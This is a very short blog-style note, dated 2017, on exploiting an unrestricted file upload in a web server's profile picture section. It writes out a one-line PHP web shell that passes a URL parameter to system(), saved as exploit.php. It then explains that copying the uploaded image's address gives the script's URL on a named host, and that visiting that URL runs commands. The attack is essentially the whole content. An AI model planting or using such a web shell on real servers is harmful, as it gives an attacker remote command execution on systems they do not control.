unrestricted file upload

possible way to take advantage of an unrestricted file upload within a profile picture section in a web server

echo "<?php system(\$_GET['cmd']); ?>" > exploit.php

copy image address results in the following url being copied to our clipboard: http://www.nop.cat/admin/ftp/objects/XXXXXXXXXXXX.php

url to execute

Written on November 27, 2017